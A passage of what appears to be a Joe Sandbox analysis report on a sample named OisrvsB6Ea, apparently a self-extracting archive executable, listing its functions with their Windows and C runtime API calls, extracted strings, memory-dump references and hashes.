                                                                                  • Opcode Fuzzy Hash: 5f45816bc5492438fc535c19bd0c7df1262c80703358f5005ba8a5622078d027
                                                                                  • Instruction Fuzzy Hash: D65190B1D102099FCF90CFA8D985AEEBBF8FB09310F14416AE955E7251D670AA51CBA0
                                                                                  Function 0028CE87 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 133COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetTempPathW.KERNEL32(00000800,?), ref: 0028CE9D
                                                                                    • Part of subcall function 0027B690: _wcslen.LIBCMT ref: 0027B696
                                                                                  • _swprintf.LIBCMT ref: 0028CED1
                                                                                    • Part of subcall function 00274092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 002740A5
                                                                                  • SetDlgItemTextW.USER32(?,00000066,002B946A), ref: 0028CEF1
                                                                                  • _wcschr.LIBVCRUNTIME ref: 0028CF22
                                                                                  • EndDialog.USER32(?,00000001), ref: 0028CFFE
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr_wcslen
                                                                                  • String ID: %s%s%u
                                                                                  • API String ID: 689974011-1360425832
                                                                                  • Opcode ID: b782ce598f9fbc09f32a2349a139078e1a0b66544cdf29fda867815a87c3c0e8
                                                                                  • Instruction ID: 207091dcb51f2ad251fec323ce33d339a3db6edce091d07af36ff834b4122ccb
                                                                                  • Opcode Fuzzy Hash: b782ce598f9fbc09f32a2349a139078e1a0b66544cdf29fda867815a87c3c0e8
                                                                                  • Instruction Fuzzy Hash: 57416275921259AADF25EF50DC45EEA77BCEB05340F4080A6FA09E7081EF709A588F61
                                                                                  Function 00292900 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _ValidateLocalCookies.LIBCMT ref: 00292937
                                                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 0029293F
                                                                                  • _ValidateLocalCookies.LIBCMT ref: 002929C8
                                                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 002929F3
                                                                                  • _ValidateLocalCookies.LIBCMT ref: 00292A48
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                  • String ID: csm
                                                                                  • API String ID: 1170836740-1018135373
                                                                                  • Opcode ID: a83aa0b5277045ec4e54d1a3872d8feefdd93dcb43c36a5f3b6ca7723e04eb32
                                                                                  • Instruction ID: 394b7abecac7c89e0a91207b6d7d01aabfa65055b18fc4fbe6a9d5d9847d56ba
                                                                                  • Opcode Fuzzy Hash: a83aa0b5277045ec4e54d1a3872d8feefdd93dcb43c36a5f3b6ca7723e04eb32
                                                                                  • Instruction Fuzzy Hash: EA41B634A20219EFCF10DF68C885A9EBBB5EF45324F148055E815AB352DB719A69CF90
                                                                                  Function 00289955 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 106COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: _wcslen
                                                                                  • String ID: $&nbsp;$<br>$<style>body{font-family:"Arial";font-size:12;}</style>
                                                                                  • API String ID: 176396367-3743748572
                                                                                  • Opcode ID: 62c04e82fa59f32c7ca1cf5ab01d26581f7da29534ef1230021f258d6c4fa480
                                                                                  • Instruction ID: b4c8fddcde957a65c59d894041484c958038bb40cd650c5c2f1d391ecbb0848e
                                                                                  • Opcode Fuzzy Hash: 62c04e82fa59f32c7ca1cf5ab01d26581f7da29534ef1230021f258d6c4fa480
                                                                                  • Instruction Fuzzy Hash: A6315E3A66534696DA38BF549C42B76B3E4EB90720F58441EF482572C0FB90ADF087A1
                                                                                  Function 0029C8A4 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 0029C868: _free.LIBCMT ref: 0029C891
                                                                                  • _free.LIBCMT ref: 0029C8F2
                                                                                    • Part of subcall function 00298DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0029C896,?,00000000,?,00000000,?,0029C8BD,?,00000007,?,?,0029CCBA,?), ref: 00298DE2
                                                                                    • Part of subcall function 00298DCC: GetLastError.KERNEL32(?,?,0029C896,?,00000000,?,00000000,?,0029C8BD,?,00000007,?,?,0029CCBA,?,?), ref: 00298DF4
                                                                                  • _free.LIBCMT ref: 0029C8FD
                                                                                  • _free.LIBCMT ref: 0029C908
                                                                                  • _free.LIBCMT ref: 0029C95C
                                                                                  • _free.LIBCMT ref: 0029C967
                                                                                  • _free.LIBCMT ref: 0029C972
                                                                                  • _free.LIBCMT ref: 0029C97D
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                  • String ID:
                                                                                  • API String ID: 776569668-0
                                                                                  • Opcode ID: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                                                  • Instruction ID: 8355d0769bca6ecac9231f1cceeb107f42155c8f6088d6ed95b3ce6dfa3df5d3
                                                                                  • Opcode Fuzzy Hash: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                                                  • Instruction Fuzzy Hash: F51151715A0B04ABED21BBB1CD07FCB7BACAF01B04F540C15B39D66092DA75B5268F50
                                                                                  Function 0028E5EE Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 45libraryloaderCOMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,0028E669,0028E5CC,0028E86D), ref: 0028E605
                                                                                  • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 0028E61B
                                                                                  • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 0028E630
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressProc$HandleModule
                                                                                  • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                                                  • API String ID: 667068680-1718035505
                                                                                  • Opcode ID: 57b7b4da0e60d5a66a3014eabe722aeb3c87188e4def2b313abe8b5178c362cd
                                                                                  • Instruction ID: a13ebad566804cd2ac18b9ed7cc195b0734f966ad7aeaf266a9ab5652fea3f61
                                                                                  • Opcode Fuzzy Hash: 57b7b4da0e60d5a66a3014eabe722aeb3c87188e4def2b313abe8b5178c362cd
                                                                                  • Instruction Fuzzy Hash: AAF0C279BB3633AB0F21AEA46C8856663CC6A27741306053AEA01D3590FF50CC705B91
                                                                                  Function 00298900 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 30COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _free.LIBCMT ref: 0029891E
                                                                                    • Part of subcall function 00298DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0029C896,?,00000000,?,00000000,?,0029C8BD,?,00000007,?,?,0029CCBA,?), ref: 00298DE2
                                                                                    • Part of subcall function 00298DCC: GetLastError.KERNEL32(?,?,0029C896,?,00000000,?,00000000,?,0029C8BD,?,00000007,?,?,0029CCBA,?,?), ref: 00298DF4
                                                                                  • _free.LIBCMT ref: 00298930
                                                                                  • _free.LIBCMT ref: 00298943
                                                                                  • _free.LIBCMT ref: 00298954
                                                                                  • _free.LIBCMT ref: 00298965
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                  • String ID: p*
                                                                                  • API String ID: 776569668-4114540210
                                                                                  • Opcode ID: 4cfb19c77c355cfd3970d75e315a90cb94b62909e1980c1840aaa79187a01ffd
                                                                                  • Instruction ID: 80f37f7fe1cfd85295655a3217f2751afe8fa0bbcd563e0f11320f118e365a0d
                                                                                  • Opcode Fuzzy Hash: 4cfb19c77c355cfd3970d75e315a90cb94b62909e1980c1840aaa79187a01ffd
                                                                                  • Instruction Fuzzy Hash: E2F0DA71C22222DB8F466F24FD1A4157BA5FB3A7243090507F614562B1CF318D669FD1
                                                                                  Function 0028146A Relevance: 9.1, APIs: 6, Instructions: 98timeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 002814C2
                                                                                    • Part of subcall function 0027B146: GetVersionExW.KERNEL32(?), ref: 0027B16B
                                                                                  • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 002814E6
                                                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 00281500
                                                                                  • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00281513
                                                                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 00281523
                                                                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 00281533
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: Time$File$System$Local$SpecificVersion
                                                                                  • String ID:
                                                                                  • API String ID: 2092733347-0
                                                                                  • Opcode ID: 7b0ecb104edfe66a6d2003d91875fc66d754fe22b352a30d233228b170131dad
                                                                                  • Instruction ID: ad9bfc154ef9323739419eb25bd7f07e835bf38397d54c19da637c841a73aeda
                                                                                  • Opcode Fuzzy Hash: 7b0ecb104edfe66a6d2003d91875fc66d754fe22b352a30d233228b170131dad
                                                                                  • Instruction Fuzzy Hash: D331F879118306ABC700DFA8D88499BB7F8FF99714F404A1EF999D3250E730D519CBA6
                                                                                  Function 00292AFA Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetLastError.KERNEL32(?,?,00292AF1,002902FC,0028FA34), ref: 00292B08
                                                                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00292B16
                                                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00292B2F
                                                                                  • SetLastError.KERNEL32(00000000,00292AF1,002902FC,0028FA34), ref: 00292B81
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLastValue___vcrt_
                                                                                  • String ID:
                                                                                  • API String ID: 3852720340-0
                                                                                  • Opcode ID: 6a6a542474a781e99f16406599d37a81267668c80a263adc1d90e133a9491284
                                                                                  • Instruction ID: 867e44ea0f592b5bc841bbdbf31465875e9ab66e559080cbc5e4aab0168a4d30
                                                                                  • Opcode Fuzzy Hash: 6a6a542474a781e99f16406599d37a81267668c80a263adc1d90e133a9491284
                                                                                  • Instruction Fuzzy Hash: 4A01D43213A312BFAE142E747CA9B2A7B99EF02778B60073AF110550E0EF614D259A54
                                                                                  Function 002997E5 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetLastError.KERNEL32(?,002B1098,00294674,002B1098,?,?,002940EF,?,?,002B1098), ref: 002997E9
                                                                                  • _free.LIBCMT ref: 0029981C
                                                                                  • _free.LIBCMT ref: 00299844
                                                                                  • SetLastError.KERNEL32(00000000,?,002B1098), ref: 00299851
                                                                                  • SetLastError.KERNEL32(00000000,?,002B1098), ref: 0029985D
                                                                                  • _abort.LIBCMT ref: 00299863
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLast$_free$_abort
                                                                                  • String ID:
                                                                                  • API String ID: 3160817290-0
                                                                                  • Opcode ID: c0d6ef21508c4d722f1bc7c2d92b3f4bd3c69968fb0a5db7cedded6be131695d
                                                                                  • Instruction ID: 8d174173b30a0773b4b2ce8a2c710aa443f699ea871b98c002533c0d602a998c
                                                                                  • Opcode Fuzzy Hash: c0d6ef21508c4d722f1bc7c2d92b3f4bd3c69968fb0a5db7cedded6be131695d
                                                                                  • Instruction Fuzzy Hash: 1BF0C83517060267CF12773C7C0EA1B1A6AAFD3771F25013CF61892192FE318C768966
                                                                                  Function 0028DC3B Relevance: 9.0, APIs: 6, Instructions: 42windowsynchronizationCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • WaitForSingleObject.KERNEL32(?,0000000A), ref: 0028DC47
                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0028DC61
                                                                                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0028DC72
                                                                                  • TranslateMessage.USER32(?), ref: 0028DC7C
                                                                                  • DispatchMessageW.USER32(?), ref: 0028DC86
                                                                                  • WaitForSingleObject.KERNEL32(?,0000000A), ref: 0028DC91
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                                                                                  • String ID:
                                                                                  • API String ID: 2148572870-0
                                                                                  • Opcode ID: 6133986c11afa0002137d1df20c734825c5f39710c7ecd4884da117ad9bcd41d
                                                                                  • Instruction ID: 5105e0aafe184ac2b23c59ba6acf9857e05ccd4a360a4ad2080e680a7c3d7f83
                                                                                  • Opcode Fuzzy Hash: 6133986c11afa0002137d1df20c734825c5f39710c7ecd4884da117ad9bcd41d
                                                                                  • Instruction Fuzzy Hash: DCF03171E02219BBCB20ABA5EC4CECB7F7DEF42751B004012F50AD1090D675C649CBA1
                                                                                  Function 0028A80C Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 237COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 0028A699: GetDC.USER32(00000000), ref: 0028A69D
                                                                                    • Part of subcall function 0028A699: GetDeviceCaps.GDI32(00000000,0000000C), ref: 0028A6A8
                                                                                    • Part of subcall function 0028A699: ReleaseDC.USER32(00000000,00000000), ref: 0028A6B3
                                                                                  • GetObjectW.GDI32(?,00000018,?), ref: 0028A83C
                                                                                    • Part of subcall function 0028AAC9: GetDC.USER32(00000000), ref: 0028AAD2
                                                                                    • Part of subcall function 0028AAC9: GetObjectW.GDI32(?,00000018,?), ref: 0028AB01
                                                                                    • Part of subcall function 0028AAC9: ReleaseDC.USER32(00000000,?), ref: 0028AB99
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: ObjectRelease$CapsDevice
                                                                                  • String ID: "($($A(
                                                                                  • API String ID: 1061551593-872755984
                                                                                  • Opcode ID: 2e046588e9903d61a3a043c8044fd2e7fd536dfa95765a3ac6341d1166cbb198
                                                                                  • Instruction ID: 5a55f3699923d8d27564c0fd413fa7f2a9a69890a9468b60cd5dd63c561fc06c
                                                                                  • Opcode Fuzzy Hash: 2e046588e9903d61a3a043c8044fd2e7fd536dfa95765a3ac6341d1166cbb198
                                                                                  • Instruction Fuzzy Hash: 0191D175618355AFE610DF25D848A2BBBF8FF89700F00491EF99AD3260DB70A945CB62
                                                                                  Function 0027C0C5 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 148COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 002805DA: _wcslen.LIBCMT ref: 002805E0
                                                                                    • Part of subcall function 0027B92D: _wcsrchr.LIBVCRUNTIME ref: 0027B944
                                                                                  • _wcslen.LIBCMT ref: 0027C197
                                                                                  • _wcslen.LIBCMT ref: 0027C1DF
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: _wcslen$_wcsrchr
                                                                                  • String ID: .exe$.rar$.sfx
                                                                                  • API String ID: 3513545583-31770016
                                                                                  • Opcode ID: d2b894195272437da4279b485e97a6d223d6ad5765c0298d27d7d7c4e74aa060
                                                                                  • Instruction ID: 10f27b6cf40fa52e3770f4b491be7379d2fe21d29256730e404bc29eb0f94bb4
                                                                                  • Opcode Fuzzy Hash: d2b894195272437da4279b485e97a6d223d6ad5765c0298d27d7d7c4e74aa060
                                                                                  • Instruction Fuzzy Hash: 95412A2557035296C732AF748842A7BB3A8EF42704F30850EF98D6B1C1EB705DB6C791
                                                                                  Function 0027BB03 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 127COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _wcslen.LIBCMT ref: 0027BB27
                                                                                  • GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,0027A275,?,?,00000800,?,0027A23A,?,0027755C), ref: 0027BBC5
                                                                                  • _wcslen.LIBCMT ref: 0027BC3B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: _wcslen$CurrentDirectory
                                                                                  • String ID: UNC$\\?\
                                                                                  • API String ID: 3341907918-253988292
                                                                                  • Opcode ID: b60bf1937add5d1f3525eb44d2817862e96a84dde9c1bfeeae5c599b1facaebc
                                                                                  • Instruction ID: 30fee266cf2275ed7e67d5480a17a24596e941422d85c0cc40883031e04b4be0
                                                                                  • Opcode Fuzzy Hash: b60bf1937add5d1f3525eb44d2817862e96a84dde9c1bfeeae5c599b1facaebc
                                                                                  • Instruction Fuzzy Hash: 19419275420216AECF23AF60CC42FEB7769AF45394F10C46AF858A7151EB709AB48F60
                                                                                  Function 0028CD58 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 103COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _wcschr.LIBVCRUNTIME ref: 0028CD84
